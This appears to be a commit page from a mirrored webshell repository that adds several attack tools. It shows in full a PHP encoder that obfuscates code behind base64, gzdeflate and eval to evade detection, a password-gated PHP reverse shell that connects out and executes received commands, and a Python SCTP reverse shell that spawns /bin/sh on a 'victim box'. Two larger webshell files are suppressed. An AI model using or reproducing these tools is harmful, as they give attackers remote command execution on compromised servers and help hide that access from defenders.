mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
update php
This commit is contained in:
parent
7fd6ddd078
commit
4ba14147b0
5 changed files with 4370 additions and 0 deletions
103
php/carbylamine.txt
Normal file
103
php/carbylamine.txt
Normal file
|
@ -0,0 +1,103 @@
|
|||
<?php
|
||||
function rstr() //Random String Function
|
||||
{
|
||||
$len=rand(3,6);
|
||||
$chr='';
|
||||
for($i=1;$i<=$len;$i++)
|
||||
{
|
||||
$chr.=rand(0,1) ? chr(rand(65,90)) : chr(rand(97,122));
|
||||
}
|
||||
return $chr;
|
||||
}
|
||||
function enjumble($data) //Custom Encoding + Base64 + gzinflate()
|
||||
{
|
||||
for($i=0;$i<strlen($data);$i++)
|
||||
{
|
||||
$data[$i]=chr(ord($data[$i])+1);
|
||||
}
|
||||
return base64_encode(gzdeflate($data,9));
|
||||
}
|
||||
function striptag($in) //Remove '<?php' from initial code
|
||||
{
|
||||
$pos = strpos($in,"<?php"); //to do: add support for short_tags
|
||||
if(is_numeric($pos))
|
||||
{
|
||||
for($i=$pos;$i<=$pos+4 && strlen($in) >=5;$i++)
|
||||
{
|
||||
$in[$i]=' ';
|
||||
}
|
||||
return $in;
|
||||
}
|
||||
else
|
||||
{
|
||||
return $in;
|
||||
}
|
||||
}
|
||||
function makeoutfile($str)
|
||||
{ $funcname=rstr();
|
||||
$varname='$'.rstr();
|
||||
$template=
|
||||
"<?php function ".$funcname."($varname)
|
||||
{
|
||||
$varname=gzinflate(base64_decode($varname));
|
||||
for(\$i=0;\$i<strlen($varname);\$i++)
|
||||
{
|
||||
".$varname."[\$i] = chr(ord(".$varname."[\$i])-1);
|
||||
}
|
||||
return $varname;
|
||||
}eval($funcname(\"";
|
||||
$str=enjumble($str);
|
||||
$template = $template . $str."\"));?>";
|
||||
return $template;
|
||||
}
|
||||
function main($argc,$argv)
|
||||
{
|
||||
$banner=
|
||||
"\n +-------------------------------------------------------------------+
|
||||
|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|
||||
|+ +|
|
||||
+____ _ _ _ +|
|
||||
/ __ \ | | | | (_) +|
|
||||
| / \/ __ _ _ __ | |__ _ _ | | __ _ _ __ ___ _ _ __ _+|_
|
||||
| | / _` || '__|| '_ \ | | | || | / _` || '_ ` _ \ | || '_ \ / _ \
|
||||
| \__/\| (_| || | | |_) || |_| || || (_| || | | | | || || | | || __/
|
||||
\____/ \__,_||_| |_.__/ \__, ||_| \__,_||_| |_| |_||_||_| |_| \___|
|
||||
|+ __/ | +|
|
||||
|+ Carbylamine PHP Encoder +|
|
||||
|+ v0.1.1 Nightly +|
|
||||
|+ +|
|
||||
|+ +|
|
||||
|+ Coded by Prakhar Prasad +|
|
||||
|+ (prakharpd@gmail.com) +|
|
||||
|+ +|
|
||||
|+ +|
|
||||
|+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++|
|
||||
+-------------------------------------------------------------------+\n\n";
|
||||
$usage="$banner Syntax: ".$_SERVER['PHP_SELF']." <file to encode> <output file>\n";
|
||||
if($argc==1) {echo $usage ; die();}
|
||||
if($argc>1) $file = $argv[1];
|
||||
if($argc>2) $outfile = $argv[2];
|
||||
if(empty($file) || empty($outfile)) { echo "Input/Output filename not entered!\n\n\x07" ;die();}
|
||||
if(!file_exists($file))
|
||||
{
|
||||
echo "$banner Error: Input file doesn't exist\n\n\x07";
|
||||
}
|
||||
else{
|
||||
$orginal_size=round(filesize($file)/1024,2);
|
||||
echo "$banner Encoding : $file ($orginal_size KB) \n\n ";
|
||||
$output_filename=$outfile;
|
||||
$outfile=fopen($outfile,'w+');
|
||||
$file=fread(fopen($file,'r'),filesize($file));
|
||||
$outdata=makeoutfile(striptag($file));
|
||||
$newsize=round(strlen($outdata)/1024,2);
|
||||
echo " Compression : ".@round(100-(($newsize*100)/($orginal_size!=0?$orginal_size:1)),2)."%\n\n";
|
||||
if(!fwrite($outfile,$outdata))
|
||||
{
|
||||
echo " Unable to write to $output_filename\n\n\x07";
|
||||
}
|
||||
else
|
||||
{
|
||||
echo " Successfully Encoded! to $output_filename\n\n" ;
|
||||
}}}
|
||||
main($argc,$argv);
|
||||
?>
|
2347
php/indrajith-2.0.txt
Normal file
2347
php/indrajith-2.0.txt
Normal file
File diff suppressed because it is too large
Load diff
1782
php/indrajith.txt
Normal file
1782
php/indrajith.txt
Normal file
File diff suppressed because it is too large
Load diff
102
php/reverseshell-poc.txt
Normal file
102
php/reverseshell-poc.txt
Normal file
|
@ -0,0 +1,102 @@
|
|||
<?php
|
||||
###################################################
|
||||
# Reverse Shell v1.0 #
|
||||
# Authentication Feature #
|
||||
# #
|
||||
# Hacksys Team - Panthera #
|
||||
# Author: Ashfaq Ansari #
|
||||
# hacksysteam@hotmail.com #
|
||||
# http://hacksys.vfreaks.com #
|
||||
# Designed for Linux #
|
||||
# Thanks to lionaneesh #
|
||||
# lionaneesh@gmail.com #
|
||||
###################################################
|
||||
|
||||
ini_set('max_execution_time' ,0);
|
||||
|
||||
$VERSION = "1.0";
|
||||
$ip = "127.0.0.1"; #Change this
|
||||
$port = 4444; #Change this
|
||||
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)
|
||||
|
||||
$banner = ("
|
||||
_ _ _ _____
|
||||
| | | | | | / ____|
|
||||
| |__| | __ _ ___| | _| (___ _ _ ___
|
||||
| __ |/ _` |/ __| |/ /\___ \| | | / __|
|
||||
| | | | (_| | (__| < ____) | |_| \__ \
|
||||
|_| |_|\__,_|\___|_|\_\_____/ \__, |___/
|
||||
_______ __/ |
|
||||
|__ __| |___/
|
||||
| | ___ __ _ _ __ ___
|
||||
| |/ _ \/ _` | '_ ` _ \
|
||||
| | __/ (_| | | | | | |
|
||||
|_|\___|\__,_|_| |_| |_|
|
||||
|
||||
Reverse Shell in PHP
|
||||
Author: Ashfaq Ansari
|
||||
hacksysteam@hotmail.com
|
||||
http://hacksys.vfreaks.com/\n\n");
|
||||
|
||||
$pwd = shell_exec("pwd");
|
||||
$sysinfo = shell_exec("uname -a");
|
||||
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
|
||||
$date = shell_exec("date");
|
||||
$len = 1337;
|
||||
$info =
|
||||
("
|
||||
System Information:\n$sysinfo
|
||||
Current Working Directory: $pwd
|
||||
User Group: $id
|
||||
Current Date and Time: $date\n
|
||||
");
|
||||
|
||||
print "\nTrying to connect to: $ip on port $port ...\n\n";
|
||||
|
||||
$sockfd = fsockopen($ip , $port , $errno, $errstr );
|
||||
|
||||
if($errno != 0)
|
||||
{
|
||||
print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
|
||||
die(0);
|
||||
}
|
||||
else if (!$sockfd)
|
||||
{
|
||||
print "Fatal : An unexpected error was occured when trying to connect!\n";
|
||||
}
|
||||
else
|
||||
{
|
||||
print "Connected to: $ip on port $port ...\n\n";
|
||||
fputs ($sockfd , $banner);
|
||||
fputs($sockfd ,"Enter Password: ");
|
||||
$getpass = trim(fgets($sockfd, strlen($password) + 2));
|
||||
|
||||
if ($getpass == $password)
|
||||
{
|
||||
fputs($sockfd, "\nAuthentication Successfull..\n");
|
||||
fputs($sockfd, $info);
|
||||
while(!feof($sockfd))
|
||||
{
|
||||
$cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
|
||||
fputs ($sockfd , $cmdPrompt );
|
||||
$command = trim(fgets($sockfd, $len));
|
||||
if (trim($command) == "exit")
|
||||
{
|
||||
fputs($sockfd ,"\nAborted by user... Exiting..." );
|
||||
fclose($sockfd);
|
||||
die(0);
|
||||
}
|
||||
fputs($sockfd , "\n" . shell_exec($command) . "\n");
|
||||
}
|
||||
fclose($sockfd);
|
||||
die(0);
|
||||
}
|
||||
else
|
||||
{
|
||||
fputs($sockfd ,"\nInvalid Password... Quitting...");
|
||||
fclose($sockfd);
|
||||
die(0);
|
||||
}
|
||||
}
|
||||
?>
|
||||
|
36
py/sctp_reverse.py.txt
Normal file
36
py/sctp_reverse.py.txt
Normal file
|
@ -0,0 +1,36 @@
|
|||
#!/usr/bin/python
|
||||
# SCTP Reverse Shell (TCP mode)
|
||||
# Requires pysctp and sctp to be working
|
||||
# on the victim box.
|
||||
# My perfect saturday... Involves #
|
||||
# infodox - Insecurety Research 2013
|
||||
# insecurety.net | @info_dox
|
||||
|
||||
# I probably imported too much things. Who cares.
|
||||
import socket
|
||||
import _sctp
|
||||
import sctp
|
||||
from sctp import *
|
||||
import os
|
||||
import subprocess
|
||||
|
||||
host = '127.0.0.1' # CHANGEME
|
||||
port = 1337 # CHANGEME
|
||||
|
||||
socket.setdefaulttimeout(60)
|
||||
s = None
|
||||
try:
|
||||
s = sctpsocket_tcp(socket.AF_INET)
|
||||
s.connect((host,port))
|
||||
s.send('g0tsh3ll!\n')
|
||||
save = [ os.dup(i) for i in range(0,3) ]
|
||||
os.dup2(s.fileno(),0)
|
||||
os.dup2(s.fileno(),1)
|
||||
os.dup2(s.fileno(),2)
|
||||
shell = subprocess.call(["/bin/sh","-i"])
|
||||
[ os.dup2(save[i],i) for i in range(0,3)]
|
||||
[ os.close(save[i]) for i in range(0,3)]
|
||||
os.close(s.fileno())
|
||||
except Exception:
|
||||
print "Connection Failed! Is there even a listener?"
|
||||
pass
|
Loading…
Reference in a new issue